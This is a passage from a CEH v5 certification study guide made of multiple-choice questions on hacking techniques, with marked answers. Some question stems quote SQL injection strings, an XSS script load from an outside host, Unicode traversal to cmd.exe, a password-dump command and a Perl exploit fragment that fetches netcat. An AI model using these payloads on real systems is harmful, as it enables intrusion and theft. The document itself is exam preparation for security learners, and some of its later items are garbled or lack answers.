b. Change password of user nobodyc. Change the files Modification Access Creation times*d. Download rootkits and passwords into a new directory

13. How many user ids can you identify in these log entries that the attacker has tamperedwith?a. nobody, dns*b. acmr, dnsc. IUSR_<machine_name>d. nobody, IUSR_<machine_name>

14. Which tool/utility can help you extract the application layer data from each TCPconnection from a log file into separate files?a. Snortb. TCPflow*c. Tcpdumpd. argus

15. Which of the following represents the initial two commands that an IRC client sends tojoin an IRC network?a. USER, PASSb. USER, NICK*c. LOGIN, USERd. LOGIN, NICK

16. A ______ is an automated client that is remotely controlled via a networka. Probeb. Autorooterc. Bot*d. Zombie

17. _______ is a utility which exploits the nature of white space and allows the user toconceal information in these white spaces.a. Snow*b. Image Hidec. Gif-It-Upd. NiceText

18. Null sessions are un-authenticated connections (not using a username or password.) toan NT or 2000 system. Which TCP and UDP ports must you filter to check null sessionson your network?a. 137 and 139b. 139 and 445*c. 139 and 443

Page 31: 6673158 CEH v5 Exam Study Guide

d. 137 and 443

19. ________ is found in all version of NTFS and is described as the ability to fork file datainto existing files without affecting their functionality, size, or display to traditional filebrowsing utilities like dir or Windows Explorera. Steganographyb. Merge Streamsc. Alternate Data Streams*d. NetBIOS vulnerability

20. What vulnerability does the following command take advantage of?type c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exea. HFSb. ADS*c. NTFSd. Backdoor access

21. Jake works as a system administrator at Acme Corp. Jason, an accountant of the firmbefriends him at the canteen and tags along with him on the pretext of appraising himabout potential tax benefits. Jason waits for Jake to swipe his access card and follows himthrough the open door into the secure systems area. How would you describe Jason’sbehavior within a security context?a. Smooth Talkingb. Swipe Gatingc. Trailingd. Tailgating*

22. ________ is a program that appears to perform a desirable and necessary function but(because of unauthorized code within it that is unknown to the user) performs functionsunknown (and definitely unwanted) by the user.a. Virusb. Keyloggerc. Trojan*d. Sniffer

23. Which of the following is not considered to be a part of active sniffing?a. ARP Spoofingb. MAC Duplicatingc. SMAC Fueling*d. MAC Flooding

24. ARP poisoning is achieved in ____ stepsa. 3b. 2*c. 1

Page 32: 6673158 CEH v5 Exam Study Guide

d. 4

25. Ivan is auditing a corporate website. Using Winhex, he alters a cookie as shown below.Before Alteration: Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;After Alteration: Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;What attack is being depicted here?a. Session Hijackingb. Cookie Stealingc. Parameter Manipulation*d. Cross Site Scripting

26. Kevin sends an email invite to Chris to visit a forum for security professionals. Chrisclicks on the link in the email message and is taken to a web based bulletin board.Unknown to Chris, certain functions are executed on his local system under his privileges,which allow Kevin access to information used on the BBS. However, no executables aredownloaded and run on the local system. What would you term this attack?a. Phishingb. Backdoor installationc. Denial of Serviced. Cross Site Scripting*

27. ______________ is the process of converting something from one representation tothe simplest form. It deals with the way in which systems convert data from one form toanother.a. UCS transformation formatsb. Canonicalization*c. Character Mappingd. Character Encoding

28. Identify SQL injection attack from the HTTP requests shown belowa. http://www.myserver.c0m/search.asp?lname=smith%27%3bupdate%20usertable%20set%20passwd%3d%27hAx0r%27%3b--%00*b. http://www.myserver.c0m/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourserver.c0m%2fbadscript.js%22%3e%3c%2fscript%3ec. http://host/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-ald. http://www.victim.com/example?accountnumber=67891&creditamount=999999999

29. ___________ ensures that the enforcement of organizational security policy does notrely on voluntary web application user compliance. It secures information by assigningsensitivity labels on information and comparing this to the level of sensitivity a user isoperating at.

Page 33: 6673158 CEH v5 Exam Study Guide

a. Discretionary Access Controlb. Mandatory Access Control*c. Role-based Access Controld. Authorized Access Control

30. Kevin has been asked to write a short program to gather user input for a web application.He likes to keep his code neat and simple. His chooses to use printf(str)where heshould have ideally used printf(“%s”, str). What attack will his program exposethe web application to?a. Cross Site Scriptingb. Format String Attack*c. Unicode Traversal Attackd. SQL injection Attack

31. StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft's/GS option use _________ defense against buffer overflow attacks.a. Hex editingb. Format checkingc. Canary*d. Non-executing stack

32. How will you differentiate between SSL and S-HTTP?a. SSL operates at the transport layer and S-HTTP operates at the application layer*b. SSL operates at the network layer and S-HTTP operates at the application layerc. SSL operates at the application layer and S-HTTP operates at the network layerd. SSL operates at the application layer and S-HTTP operates at the transport layer

33. _____________ is a type of symmetric-key encryption algorithm that transforms afixed-length block of plaintext (unencrypted text) data into a block of ciphertext(encrypted text) data of the same length.a. Stream Cipherb. Bit Cipherc. Block Cipher*d. Hash Cipher

34. ________________ is any process through which one proves and verifies certaininformation.a. Identificationb. Verificationc. Enumerationd. Authentication*

John has a proxy server on his network which caches and filters web access. He has shut down all

Page 34: 6673158 CEH v5 Exam Study Guide

unnecessary ports and services. Additionally, he has installed a firewall (Cisco PIX) that will notallow users to connect to any outbound ports. Jack, a network user has successfully connected to aremote server on port 80 using netcat. He could in turn drop a shell from the remote machine.Q1 John wants to harden his network such that a remote user does not do the same to hisnetwork. Choose the option that can be easily and more effectively implemented.a. Do not use a proxy as application layer does not provide adequate protectionb. Limit HTTP CONNECT on the network*c. Sniff the traffic and look for lengthy connection periodsd. Filter port 80

Q2 Assuming an attacker wants to penetrate John’s network, which of the following options is helikely to choose?a. Use reverse shell using FTP protocolb. Use HTTPTunnel or Stunnel on port 80 and 443*c. Use Monkey shelld. Use ClosedVPN

Derek has stumbled upon a wireless network and wants to assess its security. However, he doesnot find enough traffic for a good capture. He intends to use AirSnort on the captured traffic tocrack the WEP key and does not know the IP address range or the AP.Q4. How can he generate traffic on the network so that he can capture enough packets to crackthe WEP key?a. Derek can use a session replay on the packets capturedb. Derek can use KisMAC as it needs two USB devices to generate trafficc. Use Ettercap to discover the gateway and ICMP ping flood tool to generate traffic*d. Use any ARP requests found in the capture

Q5 Why does Derek need to capture five to ten million packets in order to crack WEP with AirSnort?a. Air Snort implements the FMS attack and only encrypted packets are counted*b. All IVs are vulnerable to attackc. A majority of weak IVs transmitted by access points and wireless cards are not filtered bycontemporary wireless manufacturersd. Air Snort uses a cache of packets

Q6 Derek would like your advice on using a tool that can save him time and get him better results

Page 35: 6673158 CEH v5 Exam Study Guide

with lesser packets. You would like to recommend a tool that uses KoreK’s implementation.Which tool would you recommend from the list below?a. John the Ripperb. Shmooc. Aircrack*d. Kismet

Q7 Derek re-injects a captured packet back onto the network. He does this hundreds of timeswithin a second. The packet is correctly encrypted and Derek assumes it is an ARP request packet.The wireless host responds with a stream of responses, all individually encrypted with differentIVs. What is this attack most appropriately called?a. Injection attackb. Replay attack*c. Spoof attackd. Rebound attack

Q8 Derek discovers that the wireless AP transmits 128 bytes of plaintext, and the station respondsby encrypting the plaintext. It then transmits the resulting ciphertext using the same key andcipher that are used by WEP to encrypt subsequent network traffic. What authenticationmechanism is being followed here?a. no authenticationb. open system authenticationc. shared key authentication*d. single key authentication

Your system has been compromised. From the logs available, you notice certain commands. Youtry to reconstruct the events from the entries available. You suspect that the attacker hasexploited the Unicode vulnerability.Q9 As inferred from the following entry what is the attacker attempting to do?GET/…/…À/winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exeHTTP/1.1a. Copy cmd.exe to the directory the hacker will work from*b. Replace the original cmd.exe on the compromised machinec. Rename cmd.exe to cmdl.exe in order to deface the webpaged. Drop a shell from the remote computer

Q 10 As inferred from the following entry which of the following statements describes the

Page 36: 6673158 CEH v5 Exam Study Guide

attacker’s effort?cmd/c C:\ProgramFiles\CommonFiles\system\...\pdump.exe>>C:\mine.txta. Enumerate users and passwords with Password Dumpb. Copy pdump.exe and rename it to mine.txtc. Execute pdump.exe and save into mine.txt*d. Copy mine.txt into the directory where pdump.exe resides

What is the hacker really trying to steal?a. har.txtb. SAM file*c. Repair filed. Exploits

Q16 Liza has forgotten her password to an online book shelf. The web application asks her to keyin her email so that they can send her the password. Liza enters her email [email protected]’.The application displays server error. What is wrong with the web application?a. The web server may be downb. The email is not validc. The ISP connection is not reliabled. User input is not sanitized*

Q17 Bryan notices the error on the web page and asks Liza to enter liza’ or ‘1’=’1 in theemail field. They are greeted with a message “Your login information has been mailed [email protected]”. What do you think has occurred?a. The web application returned the first record it found*b. The web application picked up a record at randomc. The web application emailed the administrator about the errord. The server error has caused the application to malfunction

Q18 Bryan is convinced that the web application is vulnerable to SQL injection. He knows that theinjection is successful if he receives a response indicating that the login information has beenmailed to a user. He inputs [email protected]' AND passwd = 'janedoe. The applicationinforms that the login information has been mailed to [email protected]. However, Bryan isnot concerned about John Doe being tipped off. What could be the reason behind this?

a. John wouldn’t consider the mail seriously as he has not asked for itb. John would not be able to login anywayc. Bryan has John’s password and can use it immediately*d. Bryan can view John’s account details and re-login anytime

Page 37: 6673158 CEH v5 Exam Study Guide

Q19 Bryan inserts the following into the email field.x'; UPDATE members SET email = '[email protected]' WHERE email = '[email protected] do you think this would result in?a. Web application responds “This is not a valid email id”b. Web application responds “Your login information has been mailed [email protected]”*c. Web application responds “Your login information has been mailed [email protected]”d. Web application responds “Server error”

Q20 Dave has been assigned to test the network security of Acme Corp. The test was announcedto the employees. He created a webpage to discuss the progress of the tests with employees whowere interested in following the test. Visitors were allowed to click on a sand clock to mark theprogress of the test. Dave successfully embeds a keylogger He also added some statistics on thewebpage. The firewall protects the network well and allows strict Internet access.How was security compromised and how did the firewall respond?a. The attack did not fall through as the firewall blocked trafficb. The attack was social engineering and the firewall did not detect it*c. Security was not compromised as the webpage was hosted internallyd. The attack was deception and security was not directly compromised

Q21 What is the most common vehicle for social engineering attacks?a. Peer to Peer networksb. Local Area Networksc. Emaild. Direct in person*

Q22 Oregon Corp is fighting a litigation suit with Scamster Inc. Oregon has assigned a privateinvestigative agency to go through garbage, recycled paper, and other rubbish at Scamster’s officesite in order to find relevant information. What would you call this kind of activity?a. CI Gatheringb. Scanningc. Dumpster Diving*d. Garbage Scooping

Q23 Sabotage, Advertising and Covering are the three stages of ______________a. Social engineeringb. Reverse Social Engineering*c. Reverse Software Engineering

Page 38: 6673158 CEH v5 Exam Study Guide

d. Rapid Development Engineering

Q24 Which of the following attacks takes best advantage of an existing authenticated connectiona. Password Sniffingb. Spoofingc. Session Hijacking*d. Password Guessing

Q25 ________________ is the extraction of user names, machine names, network resources,shares and servicesa. Sniffingb. Enumeration*c. Scanningd. Cracking

Q26 ________________ is the process of mapping out the tables on the databasea. Database Fingerprinting*b. Database Scanningc. Database Enumerationd. Database Injection

Q27 What is the expected result of the following exploit?#################################################################$port = 53; # Spawn cmd.exe on port X$your = "192.168.1.1"; # Your FTP Server$user = "Anonymous"; # login as$pass = '[email protected]'; # password#################################################################$host = $ARGV[0];print "Starting ...\n";print "Server will download the file nc.exe from $your FTP server.\n";a. Opens up a telnet listener that requires no username or passwordb. Creates an FTP server with write permissions enabledc. Creates a share called “sasfile” on the target systemd. Creates an account with a username of Anonymous and a password [email protected]*

Q28 Acme Inc has recently introduced a search feature on its website for its range of washingmachines. Dan entered <script>alert(‘You have just won a washingmachine’)</script>. When he presses the search button, a pop up box appears on hisscreen with the text “You have just won a washing machine”. What is Acme Inc’s websitevulnerable to?

Page 39: 6673158 CEH v5 Exam Study Guide

a. Cookie Poisoningb. Session Hijackingc. Cross Site Scripting*d. Web server hacking

Q29 You want to carry out session hijacking on a remote server. The server and the client arecommunicating via TCP after a successful TCP three way handshake. The server has just receivedpacket #155 from the client. The client has a receive window of 230 and the server has a receivewindow of 280. Within what range of sequence numbers should a packet, sent by the client fall inorder to be accepted by the server?a. 200-280b. 156-436*c. 155-435d. 155-231e. 155-530

Q31 Jack is testing the perimeter security of DMC corp. He has identified a system in thedemilitarized zone. Using Hping and nmap, he has verified that telnet service is running on themachine. To minimize his footprint, he spoofs his IP while attempting to telnet into the network.However, he is still unable to telnet into the network. What do you think is the reason?

a. The demilitarized zone is secured by a firewallb. Jack cannot successfully use TCP while spoofing his IP*c. Jack needs to use a tool such as nmap to telnet insided. The target system does not reply to telnet even when the service is running

Q32 What is the essential difference between an ‘Ethical Hacker’ and a ‘Cracker’?a. The ethical hacker does not use the same techniques or skills as a crackerb. The ethical hacker does it strictly for financial motives unlike a crackerc. The ethical hacker has authorization from the owner of the target*d. The ethical hacker is just a cracker who is getting paid

Q33 When a malicious hacker identifies a target and wants to eventually compromise this target,what would be among the first steps that he would perform? Choose one.a. Cover his tracks by eradicating the log files and audit trailsb. Gain access to the remote computer in order to conceal the venue of attacksc. Perform a reconnaissance of the remote target for identification of venue of attacks*d. Always begin with a scan in order to quickly identify venue of attacks

Page 40: 6673158 CEH v5 Exam Study Guide

Q34 Which of the following activities will not be considered as passive footprinting?a. Go through the rubbish to find out any information that might have been discardedb. Search on financial site such as Yahoo Financial to identify assetsc. Scan the range of IP address found in the target DNS database*d. Perform multiples queries using a search engine

Q35 Why would an ethical hacker use the technique of firewalking?a. It is a technique used to discover wireless network on footb. It is a technique used to map routers on a network linkc. It is a technique used to discover the nature of rules configured on a gateway*d. It is a technique used to discover interfaces in promiscuous mode

Q37 An attacker tries to connect their wireless client, typically a laptop or PDA, to a basestationwithout authorization. What would you call this attack?a. Plug-in Unauthorized Clients Attack*b. Plug-in Unauthorized Renegade Base Station Attackc. Interception Attackd. Monitoring Attack

Q38 When SSL and SSH connections get hijacked, the only alert to the end-user is a warning thatthe credentials of the host and certificate have changed and ask if you trust the new ones. Yourorganization wants to provide some kind of interim protection its network users from such anattack. Choose the best option.a. Monitor all broadcasts from the base station and renegade base stationb. Enable SSH's StrictHostKeyChecking option, and distribute server key signatures to*mobile clients

Q39 WEP can be typically configured in 3 possible modes. They are:a. 64 bit encryption, 128 bit encryption, 254 bit encryptionb. 30 bit encryption, 48 bit encryption, 64 bit encryptionc. No encryption, 40 bit encryption, 128 bit encryption*d. No encryption, 48 bit encryption, 64 bit encryption

Q40 An attacker with the proper equipment and tools can easily flood the 2.4 GHz frequency, sothat the signal to noise drops so low, that the wireless network ceases to function. What wouldyou call this attack?a. Hammingb. Floodingc. Jamming*d. Scooping

Page 41: 6673158 CEH v5 Exam Study Guide

Q41 Jack supports the parasitic grid movement actively. The grid is an underground movement todeploy free wireless access zones in metropolitan areas. Jack is part of the group of volunteersdeploying, at their own expense, a wireless access point on the outside of their home, or at worstat a window, with the access point connected to the volunteer's PC. What tool can an attacker useto hide his access point among legitimate access points and steal credentials?

a. Dsniffb. AirSnortc. Netstumblerd. Fake AP*

Q42 In a switched network, the traffic flows as shown below:Step 1: Node A transmits a frame to Node C.Step 2: The switch will examine this frame and determine what the intended host is. It will thenset up a connection between Node A and Node C so that they have a 'private' connection.Step 3: Node C will receive the frame and will examine the address. After determining that it isthe intended host, it will process the frame furtherWhich of the following represents attacks that can help an attacker sniff on a switched network?a. ARP Spoofing, Switch Hijacking, MAC corruptingb. ARP Spoofing, MAC Flooding, MAC duplicating*c. Switch Flooding, Switch Tampering, Switch Hijackingd. MAC Spoofing, Ethernet Flooding, MAC harvesting

Q44 What is the advantage in encrypting the communication between the agent and the monitorin an Intrusion Detection System?a. Encryption of agent communications will conceal the presence of the agentsb. Alerts are sent to the monitor when a potential intrusion is detectedc. The monitor will know if counterfeit messages are being generated because they will notbe encrypted*d. An intruder could intercept and delete data or alerts and the intrusion can go undetected

Q45 How would you describe a simple yet very effective mechanism for sending and receivingunauthorized information or data between machines without alerting any firewalls and IDS’s on a

Page 42: 6673158 CEH v5 Exam Study Guide

network?a. Crafted Channelb. Covert Channel*c. Deceptive Channeld. Bounce Channel

Q46 Ron has configured his network to provide strong perimeter security. As part of his networkarchitecture, he has included a host that is fully exposed to attack. The system is on the publicside of the demilitarized zone, unprotected by a firewall or filtering router. What would you callsuch a host?a. DMZ hostb. DWZ hostc. Honeypotd. Bastion Host*

Q47 Eric notices repeated probes to port 1080. He learns that the protocol being used is designedto allow a host outside of a firewall to connect transparently and securely through the firewall. Hewonders if his firewall has been breached. What would be your inference?a. Eric has a Wingate package providing FTP redirection on his networkb. Eric’s network has been penetrated by a firewall breachc. Somebody is using SOCKS on the network to communicate through the firewall*d. The attacker is using the ICMP protocol to have a covert channel

Q48 Basically, there are two approaches to network intrusion detection: signature detection, andanomaly detection. The signature detection approach utilizes well-known signatures for networktraffic to identify potentially malicious traffic. The anomaly detection approach utilizes a previoushistory of network traffic to search for patterns that are abnormal, which would indicate anintrusion. How can an attacker disguise his buffer overflow attack signature such that there is agreater probability of his attack going undetected by the IDS?a. He can use polymorphic shell code – with a tool such as ADMmutate - to change thesignature of his exploit as seen by a network IDS*b. He can use a dynamic return address to overwrite the correct value in the targetmachine’s computer memoryc. He can use a shellcode that will perform a reverse telnet back to his machined. He can chain NOOP instructions into a NOOP “sled” that advances the processor’sinstruction pointer to a random place of choice

Page 43: 6673158 CEH v5 Exam Study Guide

Q49 The following is an entry captured by a network IDSEVENT4: [NOOP:X86] (tcp,dp=515,sp=1592)You are assigned the task of analyzing this entry. You notice the value 0x90, which is the mostcommon NOOP instruction for the Intel processor. You figure that the attacker is attempting abuffer overflow attack. You also notice “/bin/sh” in the ASCII part of the output. As an analystwhat would you concur about the attack?a. The attacker is attempting an buffer overflow attack and has succeededb. The attacker is attempting an exploit that launches a command-line shell*c. The attacker is creating a directory on the compromised machined. The buffer overflow attack has been neutralized by the IDS

Q50 Most NIDS systems operate in layer 2 of the OSI model. These systems feed raw traffic into adetection engine and rely on the pattern matching and/or statistical analysis to determine what ismalicious. Packets are not processed by the host’s TCP/IP stack – allowing the NIDS to analyzetraffic the host would otherwise discard. Which of the following tools allows an attacker tointentionally craft packets to confuse pattern-matching NIDS systems, while still being correctlyassembled by the host TCP/IP stack to render the attack payload?a. Tcpdumpb. Tcpfragc. Defragd. Fragroute*

Q51 How would you describe an attack where an attacker attempts to deliver the payload overmultiple packets over long periods of time with the purpose of defeating simple pattern matchingin IDS systems without session reconstruction? A characteristic of this attack would be acontinuous stream of small packets.a. Session Hijackingb. Session Stealingc. Session Splicing*d. Session Fragmentation

Q52 Why would an attacker want to perform a scan on port 137?a. To disrupt the NetBIOS SMB service on the target hostb. To check for file and print sharing on windows systemsc. To discover proxy servers on a network

Page 44: 6673158 CEH v5 Exam Study Guide

d. To discover information about a target host using NBTSTAT*

Q53 Bob wants to prevent attackers from sniffing his passwords on the wired network. Which ofthe following lists the best options?a. Kerberos, Smart card, Stanford SRP*b. SMB, SMTP, Smart cardc. RSA, LSA, POPd. SSID, WEP, Kerberos

Q54 Derek transmits an ARP to a non-broadcast address. He gets a response from a machine onthe network of its IP address. What must Derek infer?a. The machine has been trojaned by an attackerb. The machine is running a sniffer in promiscuous mode*c. The machine is configured with a local address loopd. His system has its ARP cached and is looping back into the network

Q55 You receive an e-mail with the following message:Hello Jim,As part of our annual technical maintenance, we are backing all data to our data center inPhoenix. To protect your confidential information, we need you to reset your password by loggingonto our site athttp://[email protected]/resetpass/logon.htmIf you do not reset your password within 24 hours, your online banking facilities will besuspended.Sincerely,Technical SupportCitibank GroupFrom this e-mail you suspect that this message was sent by some hacker since you have beenreading much about phishing and suspect this could be a scam. You also observe the URL in themessage and confirm your suspicion about 0xde.0xad.0xbe.0xef which looks like hexadecimalnumbers. You immediately enter the following at the Windows 2000 command prompt:ping 0xde.0xad.0xbe.0xefYou get a response with a valid IP address. What is the obstructed IP address in the e-mail URL?a. 222.173.190.239*b. 233.34.45.64c. 54.23.56.55d. 199.223.23.45

Q56 You receive an e-mail with the following message:

Page 45: 6673158 CEH v5 Exam Study Guide

Hello Steve,We are having technical difficulty in restoring user database records after the recent blackout.Your account data is corrupted. Please logon on to SuperEmailServices.com and change yourpassword.http://www.superemailservices.com%40c3405906949/support/logon.htmIf you do not reset your password within 7 days, your account will be permanently disabledlocking you out from using our e-mail services.Sincerely,Technical SupportSuperEmailServicesFrom this e-mail you suspect that this message was sent by some hacker since you have beenusing their e-mail services for the last 2 years and they never sent out an e-mail such as this. Youalso observe the URL in the message and confirm your suspicion about 3405906949 which lookslike Base10 numbers. You immediately enter the following at the Windows 2000 commandprompt:ping 3405906949You get a response with a valid IP address. What is the obstructed IP address in the e-mail URL?a. 192.34.5.9b. 10.0.3.4c. 203.2.4.5*d. 199.23.43.4

Q57 Neil notices that a single address is generating traffic from its port 500 to port 500 of severalother machines on the network. This scan is eating up most of the network bandwidth and Neil isconcerned. As a security professional, what would you infer from this scan?a. It is a worm that is malfunctioning or hardcoded to scan on port 500b. The attacker is trying to determine the type of VPN implementation and checking forIPSec*c. The attacker is trying to detect machines on the network which have SSL enabledd. It is a network fault and the originating machine is in a network loop

Q58 Erik notices a big increase in UDP packets sent to port 1026 and 1027 occasionally. He entersthe following at the command prompt.$ nc -l -p 1026 -u -vIn response, he sees the following message.

Page 46: 6673158 CEH v5 Exam Study Guide

(?(c)???漿?STOPALERT77STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION.Windows has found 47 Critical Errors.To fix the errors please do the following:1. Download Registry Repair from: www.reg-patch.com2. Install Registry Repair3. Run Registry Repair4. Reboot your computerFAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION!What would you infer from this alert?a. It is a messenger spam. Windows creates a listener on one of the low dynamic ports from1026 to 1029 and the message usually promotes malware disguised as legitimate utilities*b. It is a genuine fault of windows registry and the registry needs to be backed upc. An attacker has compromised the machine and backdoored ports 1026 and 1027d. The machine is redirecting traffic to www.reg-patch.com using adware

==========================================================While attempting to discover the remote operating system on the target computer, you receive the following results froman nmap scan:Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )Interesting ports on 172.121.12.222:(The 1592 ports scanned but not shown below are in state: filtered)Port State Service21/tcp open ftp25/tcp open smtp53/tcp closed domain80/tcp open http443/tcp open httpsRemote operating system guess: Too many signatures match to reliably guess the OS.Nmap run completed -- 1 IP address (1 host up) scanned in 277.483 secondsWhat would you do next to fingerprint the OS?(Select the Best Answer)

Run an nmap scan with the -vv option Connect to the active services and review the banner information Perform a Firewalk with that system as the target IP Perform a tcp traceroute to the system using port 53

Which of the following LM hashes represents a password of less than 8 characters?(Select all that apply)

BA810DBA98995F1817306D272A9441BB

Page 47: 6673158 CEH v5 Exam Study Guide

44EFCE164AB921CQAAD3B435B51404EE 0182BD0BD4444BF836077A718CCDF409 CEC52EB9C8E3455DC2265B23734E0DAC B757BF5C0D87772FAAD3B435B51404EE E52CAC67419A9A224A3B108F3FA6CB6D

You are scanning the target network for the first time. You are able to detect few conventional open ports. While attempting to perform conventional service identification by connecting to the open ports, the scan yields either bad or no results. As you are unsure of the protocols in use, you want to discover as many different protocols as possible. Which of the following scan options can help you achieve this?(Select the Best Answer)

Nessus scan with TCP based pings N m a p s c a n w i t h t h e _ s P ( P i n g s c a n ) s w i t c h N e t c a t s c a n w i t h t h e _ u _ e s w i t c h e s N m a p w i t h t h e _ s O ( R a w I P p a c k e t s ) s w i t c h

1 172.16.1.254 (172.16.1.254) 0.724 ms 3.285 ms 0.613 ms2 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 12.169 ms 14.958 ms 13.416 ms3 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 13.948 ms ip68-100-0-1.nv.nv.cox.net(68.100.0.1) 16.743 ms 16.207 ms4 ip68-100-0-137.nv.nv.cox.net (68.100.0.137) 17.324 ms 13.933 ms 20.938 ms5 68.1.1.4 (68.1.1.4) 12.439 ms 220.166 ms 204.170 ms6 so-6-0-0.gar2.wdc1.Level3.net (67.29.170.1) 16.177 ms 25.943 ms 14.104 ms7 unknown.Level3.net (209.247.9.173) 14.227 ms 17.553 ms 15.415 ms8 so-0-1-0.bbr1.NewYork1.level3.net (64.159.1.41) 17.063 ms 20.960 ms 19.512 ms9 so-7-0-0.gar1.NewYork1.Level3.net (64.159.1.182) 20.334 ms 19.440 ms 17.938 ms10 so-4-0-0.edge1.NewYork1.Level3.net (209.244.17.74) 27.526 ms 18.317 ms 21.202 ms11 uunet-level3-oc48.NewYork1.Level3.net (209.244.160.12) 21.411 ms 19.133 ms 18.830 ms12 0.so-6-0-0.XL1.NYC4.ALTER.NET (152.63.21.78) 21.203 ms 22.670 ms 20.111 ms13 0.so-2-0-0.TL1.NYC8.ALTER.NET (152.63.0.153) 30.929 ms 24.858 ms 23.108 ms14 0.so-4-1-0.TL1.ATL5.ALTER.NET (152.63.10.129) 37.894 ms 33.244 ms 33.910 ms15 0.so-7-0-0.XL1.MIA4.ALTER.NET (152.63.86.189) 51.165 ms 49.935 ms

Page 48: 6673158 CEH v5 Exam Study Guide

49.466 ms16 0.so-3-0-0.XR1.MIA4.ALTER.NET (152.63.101.41) 50.937 ms 49.005 ms 51.055 ms17 117.ATM6-0.GW5.MIA1.ALTER.NET (152.63.82.73) 51.897 ms 50.280 ms 53.647 ms18 example-gw1.customer.alter.net (65.195.239.14) 51.921 ms 51.571 ms 56.855 ms19 www.example.com (65.195.239.22) 52.191 ms 52.571 ms 56.855 ms20 www.example.com (65.195.239.22) 53.561 ms 54.121 ms 58.333 msYou perform the above traceroute and notice that hops 19 and 20 both show the same IP address. What does this most likely indicate?(Select the Best Answer)

An application proxying firewall A stateful inspection firewall A host based IDS A Honeypot

An employee wants to bypass detection by a network-based IDS application and does not want to attack the system containingthe IDS application. Which of the following strategies can the employee use to evade detection by a network-based IDSapplication?(Select the Best Answer)

Create a network tunnel Create multiple false positives Create a SYN flood Create a ping flood

You are the Security Administrator of Xtrinity, Inc. You have discovered that an employee has attached a modem to his telephone line and workstation. He has used this modem to dial in to his workstation, thereby bypassing your firewall. Asecurity breach has occurred as a direct result of this activity. The employee explains that he used the modem becausehe had to download software for a department project. How would you resolve this situation?(Select the Best Answer)

Reconfigure the firewall Conduct a needs analysis Install a network-based IDS Enforce the corporate security policy

Page 49: 6673158 CEH v5 Exam Study Guide

John wants to try a new hacking tool on his Linux system. As the application comes from a site in his untrusted zone, John wants to ensure that the downloaded tool has not been Trojaned. Which of the following options would indicate the best course of action for John?(Select the Best Answer)

Obtain the application via SSL Obtain the application from a CD-ROM disc Compare the file's MD5 signature with the one published on the

distribution media Compare the file's virus signature with the one published on the

distribution media

Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge cookie recipe. Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co. Jack tells Jane that there has been a problem with some accounts and asks her to verify her password with him ''just to double check our records.'' Jane does not suspect anything amiss, and parts with her password. Jack can now access Brown Co.'s computers with a valid user name and password, to steal the cookie recipe. What kind of attack is being illustrated here?(Select the Best Answer)

Reverse Psychology Reverse Engineering Social Engineering Spoofing Identity Faking Identity

Bank of Timbuktu was a medium-sized, regional financial institution in Timbuktu. The bank had deployed a new Internet-accessible Web application recently, using which customers could access their account balances, transfer money between accounts, pay bills and conduct online financial business using a Web browser. John Stevens was in charge of information security at Bank of Timbuktu. After one month in production, several customers complained about the Internet enabled banking application. Strangely, the account balances of many of the bank's customers had been changed! However, money hadn't been removed from the bank. Instead, money was transferred between accounts.Given this attack profile, John Stevens reviewed the Web application's logs and found the following entries:Attempted login of unknown user: johnmAttempted login of unknown user: susaRAttempted login of unknown user: sencat

Page 50: 6673158 CEH v5 Exam Study Guide

Attempted login of unknown user: pete'';Attempted login of unknown user: ' or 1=1--Attempted login of unknown user: '; drop table logins--Login of user jason, sessionID= 0x75627578626F6F6BLogin of user daniel, sessionID= 0x98627579539E13BELogin of user rebecca, sessionID= 0x9062757944CCB811Login of user mike, sessionID= 0x9062757935FB5C64Transfer Funds user jasonPay Bill user mike Logout of user mike What kind of attack did the Hacker attempt to carry out at the bank?(Select the Best Answer)

The Hacker attempted SQL Injection technique to gain access to a valid bank login ID.

The Hacker attempted Session hijacking, in which the Hacker opened an account with the bank, then logged in to receive

a session ID, guessed the next ID and took over Jason's session. Brute force attack in which the Hacker attempted guessing login ID and

password from password cracking tools. Brute force attack in which the Hacker attempted guessing login ID and

password from password cracking tools. The Hacker used a random generator module to pass results to the Web

server and exploited Web application CGI vulnerability.

Joseph is the Web site administrator for the Mason Insurance in New York, whose primary website is located at www.masonins.com.Joseph uses his laptop computer regularly for website administration. One night, Joseph was notified by his associate thatthe main Mason Insurance web site had been vandalized! In place of the legitimate content, the hacker had left a message''Hacker Message: You are dead! Freaks!''Joseph surfed to the Web site from his office, which was directly connected to Mason Insurance's internal network usinghis laptop. However, no changes were apparent to him and he could see the legitimate content. Joseph was puzzled whenanother employee called in to report the defaced website. Joseph decided to access the Web site using his dial-up ISPconnection, again using his laptop. He browsed to www.masonins.com to see the following web page:H@cker Mess@ge: Y0u @re De@d! Fre@ks!After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal network, and used SecureShell (SSH) to log in directly to the Web server. He ran Tripwire against the entire Web site, and found that every systemfile and all the Web content on the server were intact.

Page 51: 6673158 CEH v5 Exam Study Guide

How did the attacker accomplish this hack?(Select the Best Answer)

DNS poisoning ARP spoofing SQL injection Routing table injection

Bob is acknowledged as a hacker of repute and is popular among visitors of 'underground' sites. Bob is willing to sharehis knowledge to those who are willing to learn, and many have expressed their interest in learning from him.However, this knowledge has a risk associated with it, as it can be used for malevolent attacks as well. In this context, whatwould be the most effective method to bridge the knowledge gap between the "black" hats or crackers and the "white" hatsor computer security professionals?(Select the Best Answer)

Educate everyone with books, articles and training on risk analysis, vulnerabilities and safeguards

Hire more computer security monitoring personnel to monitor computer systems and networks

Make obtaining either a computer security certification or accreditation easier to achieve so more individuals feel that they

are a part of something larger than life Train more national guard and reservist in the art of computer security to

help out in times of emergency or crises

While doing a penetration test, you discover that the organization is using one domain for web publishing and another domainfor administration along with business operations. During what phase of the penetration test would you normally discoverthis?(Select the Best Answer)

Port Scanning Passive Information Gathering Active Attack Vulnerability Mapping

